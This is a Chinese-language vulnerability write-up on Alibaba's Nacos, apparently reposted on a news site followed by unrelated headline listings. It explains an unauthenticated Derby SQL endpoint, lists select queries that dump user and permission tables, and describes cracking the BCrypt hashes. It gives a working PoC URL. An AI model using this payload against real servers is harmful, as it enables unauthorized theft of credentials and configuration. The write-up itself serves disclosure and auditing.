简介
(相关资料图)
Nacos是阿里的开源项目,应用于微服务,微服务是将单体应用拆分成一个服务节点,nacos的主要功能是服务发现和微服务的配置集中管理。
纳科斯
一、漏洞详情
源码地址:https://github.com/alibaba/nacos
审计代码可以发现,config server中有一个接口,没有做任何的鉴权,即可执行sql语句,可以漏掉全部数据
模块中的漏洞点:nacos-config的com.alibaba.nacos.config.server.controller.ConfigOpsController中
@GetMapping(value = "/derby")public RestResult
可以看到,代码只限制了需要包含select,因此,导向可以执行任意的select查询语句
通过测试,可以用以下的语句查询到所有数据库信息
select * from usersselect * from permissionsselect * from rolesselect * from tenant_infoselect * from tenant_capacityselect * from group_capacityselect * from config_tags_relationselect * from app_configdata_relation_pubsselect * from app_configdata_relation_subsselect * from app_listselect * from config_info_aggrselect * from config_info_tagselect * from config_info_betaselect * from his_config_infoselect * from config_info
最重要的是,该接口不需要任何认证,直接就可以访问
通过读取到账号以及hash之后的密码后,因为nacos创建账号时使用的salt生成算法我们通过开启源的程序源代码已经足够分析出来
查看源码com.alibaba.nacos.console.security.nacos.NacosAuthConfig
@Overrideprotected void configure(AuthenticationManagerBuilder auth) throws Exception { auth.userDetailsService(userDetailsService).passwordEncoder(passwordEncoder());}@Overrideprotected void configure(HttpSecurity http) throws Exception { if (StringUtils.isBlank(authConfigs.getNacosAuthSystemType())) { http .csrf().disable().cors() // We don"t need CSRF for JWT based authentication .and().sessionManagement().sessionCreationPolicy(SessionCreationPolicy.STATELESS) .and().authorizeRequests().requestMatchers(CorsUtils::isPreFlightRequest).permitAll() .antMatchers(LOGIN_ENTRY_POINT).permitAll() .and().authorizeRequests().antMatchers(TOKEN_BASED_AUTH_ENTRY_POINT).authenticated() .and().exceptionHandling().authenticationEntryPoint(new JwtAuthenticationEntryPoint()); // disable cache http.headers().cacheControl(); http.addFilterBefore(new JwtAuthenticationTokenFilter(tokenProvider), UsernamePasswordAuthenticationFilter.class); }}@Beanpublic PasswordEncoder passwordEncoder() { return new BCryptPasswordEncoder();}
可以看到,都是默认的,使用者没有办法做修改
因此,参考工具类com.alibaba.nacos.console.utils.PasswordEncoderUtil
通过这种方式,可以在本地区快速的爆破出哈希值显示的密码
package com.alibaba.nacos.console.utils;import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;/** * Password encoder tool. * * @author nacos */public class PasswordEncoderUtil { public static void main(String[] args) { System.out.println(new BCryptPasswordEncoder().encode("nacos")); } public static Boolean matches(String raw, String encoded) { return new BCryptPasswordEncoder().matches(raw, encoded); } public static String encode(String raw) { return new BCryptPasswordEncoder().encode(raw); }}
二、漏洞复现
poc:
/nacos/v1/cs/ops/derby?sql=select%20*%20from%20users%20"
nacos url后拼接即可
标签:
上一篇 : 差20多天就过年了 适合过年穿的衣服搭配?
下一篇 : 最后一页
简介Nacos是阿里的开源项目,应用于微服务,微服务是将单体应用拆分
06-01 12:05:26
适合过年穿的衣服搭配?差20多天就过年了,相信很多小仙女都已经买好了
06-01 11:39:24
【新华社北京5月31日电】国防部新闻发言人谭克非5月31日就美炒作中方“
06-01 10:58:07
新修订的《北京市未成年人保护条例》(以下简称《条例》)近日经第十六
06-01 10:00:18
近日,成都市实验小学东部新区校区举行“爱成都,迎大运”成都东部新区
06-01 09:28:15
特斯拉CEO马斯克的私人飞机北京时间5月31日21时26分落地上海虹桥机场,
06-01 08:32:20
上海立达学院怎么样好不好?附上海立达学院最好的专业排名及王牌专业介
06-01 07:29:59
1、梦见薄纱,薄纱若隐若现的感觉,会让你觉得不真实。预示着你最近会
06-01 06:45:44
受访专家:清华大学第一附属医院感染科主任张维燕清华大学第一附属医院
06-01 06:03:50
1、卖房前途无限,但是真要踏入房地产,还请慎重考虑。2、要么活的更好
06-01 04:56:53
证券时报e公司讯,鞍重股份(002667)9月26日晚间公告,公司控股子(孙)
06-01 02:53:00
马自达一直以偏执的态度,不想迎合所有人,只想让懂它的人享受“人马合
06-01 01:08:03
你们好,最近小品发现有诸多的小伙伴们对于红烧羊排骨的家常做法,红烧
06-01 00:19:02
今天来聊聊关于pid公式推导,pid公式的文章,现在就为大家来简单介绍下
05-31 23:17:13
1、扁鹊、华佗、孙思邈、张仲景、皇甫谧、葛洪、朱震亨、李时珍、钱乙
05-31 22:11:11
当地时间5月30日,数百名日本民众举行抗议活动,反对日本政府大幅增加
05-31 21:57:49
每日小编都会为大家带来一些知识类的文章,那么为大家带来的是班长你轻
05-31 20:47:58
智通财经APP讯豪森股份688529SH公告公司全资子公司大连豪森瑞德设备制
05-31 20:20:44
预约须知本次可预约人份:120人份。接种对象:根据说明书要求,年龄16-
05-31 19:22:06
四川经济网讯(记者刘婕)5月31日,成都市、德阳市、眉山市、资阳市四
05-31 18:24:55
译者文采一般,所以可能翻不出“诗歌”的调调,就纯直译,拉丁语水平也
05-31 14:51:25
学生必看十大励志电影:《当幸福来敲门》、《跳出我天地》、《穿普拉达
05-31 14:41:21
每日小编都会为大家带来一些知识类的文章,那么为大家带来的是乔恩方面
05-31 14:08:04
很多朋友对抖音公会不太了解,很容易加入进去,但是加入抖音公会直播的
05-31 13:56:30
IT之家5月31日消息,微软昨日发布公告称,将在6月15日从XboxGamePass中
05-31 13:14:58
人民日报健康客户端记者武星如据“都市快报橙柿互动”5月28日报道,一
05-31 13:02:02
快科技5月31日消息,美国宾夕法尼亚州立大学团队创建了用作电路的第一
05-31 12:38:26
对承担战略性任务的新型研发机构,应围绕国家和上海科技创新战略和重大
05-31 11:59:18
1、《新生儿危重症监护诊疗与护理》是2009年人民卫生出版社出版的图书
05-31 11:39:59
5月30日,教育部会同公安部、国家卫生健康委、市场监管总局等部门召开
05-31 11:16:53
当地时间5月30日,在2023法国网球公开赛男子单打首轮比赛中,德国选手
05-31 10:53:59
在3月25日举行的交通运输部发布会上,交通运输部新闻发言人孙文剑表示
05-31 10:29:11
【蹲点日记】原标题:通过角色体验,我们真切体会到外卖骑手的艰辛不易
05-31 10:01:58
近日,聆达股份发布公告,拟与铜陵狮子山高新区管委会协调的有关基金共
05-31 09:36:31
5月29日,农业银行发布公告称,为防范电信网络新型违法犯罪,切实保障
05-31 09:39:09
2023年5月30日趣睡科技融资净偿还53 77万元,融资余额2309 65万元
05-31 08:59:14
本网讯(记者汤超)能折叠的屏幕、会说话的机器人、会动的玻璃材料……
05-31 08:18:26
1、c语言中uchart=233是定义一个无符号字符型变量并且初始化它的值是23
05-31 07:50:47
在不久前2023LPL夏季转会期结束后,最为重磅的一笔转会交易莫过于RNG的
05-31 07:36:08
在蔚来的二代车中,真正走量的ET5的销量并没有取得爆款,真说“你买我
05-31 06:58:56
1、芜湖原本是一个地名,指中国安徽省芜湖市,由于网络上频频掀起浪潮
05-31 06:55:21
新经济业态催生新就业形态,近年来我国灵活就业群体规模日益壮大。据统
05-31 06:11:34
每天在我们身边都发生着许多新鲜事,当下的实时热点,最热话题。我们应
05-31 06:10:07
时间过得很快,转眼间5月马上就要过去,6月即将到来。目前中超联赛正好
05-31 05:25:47
生态民主,关于生态民主介绍这个很多人还不知道,我们一起来看看!1、《
05-31 04:55:48
1、小学班规:一、班规应以个性化为取向,二、班规应以发展性为取向。2
05-31 03:39:54
5月27日,在中国平安成立35周年的司庆表彰活动上,平安集团宣布正式上
05-31 03:31:51
新加坡主权财富基金GIC将斥资约20亿欧元收购梅塞尔约25%股份:知情人士
05-31 02:14:55
本文来源:时代财经作者:钟黛“一日夫妻”挤爆售楼处,上海网红热盘云
05-31 00:39:25
多地拉响高温警报,用电高峰将至
05-31 00:30:49
简介Nacos是阿里的开源项目,应用于微服务,微服务是将单体应用拆分
2023-06-01
适合过年穿的衣服搭配?差20多天就过年了,相信很多小仙女都已经买好了
2023-06-01
【新华社北京5月31日电】国防部新闻发言人谭克非5月31日就美炒作中方“
2023-06-01
新修订的《北京市未成年人保护条例》(以下简称《条例》)近日经第十六
2023-06-01
近日,成都市实验小学东部新区校区举行“爱成都,迎大运”成都东部新区
2023-06-01
日前从邢台市新闻办举办的南宫专场新闻发布会获悉,今年以来,南宫市坚持外引内育,大力开展招商引资,...
近日,从海带中制造环保纱线的材料创新者AlgiKnit宣布获得1300万美元(8735 6万元)的A轮融资,以通过加...
概念特点1、 定义:纤维是天然或人工合成的细丝状物质,纺织纤维则是指用来纺织布的纤维。2、 纺织纤...
中新网西宁11月21日电 题:青海水润高原:从“大动脉”到“毛细血管”的精准管理 作者 谈林明...
中新网西宁11月21日电 (记者 张添福)青海省卫生健康委员会21日消息,该省第3例本土确诊病例经过20...
Copyright © 2015-2022 欧洲纤维网版权所有 备案号:沪ICP备2022005074号-23 联系邮箱: 58 55 97 3@qq.com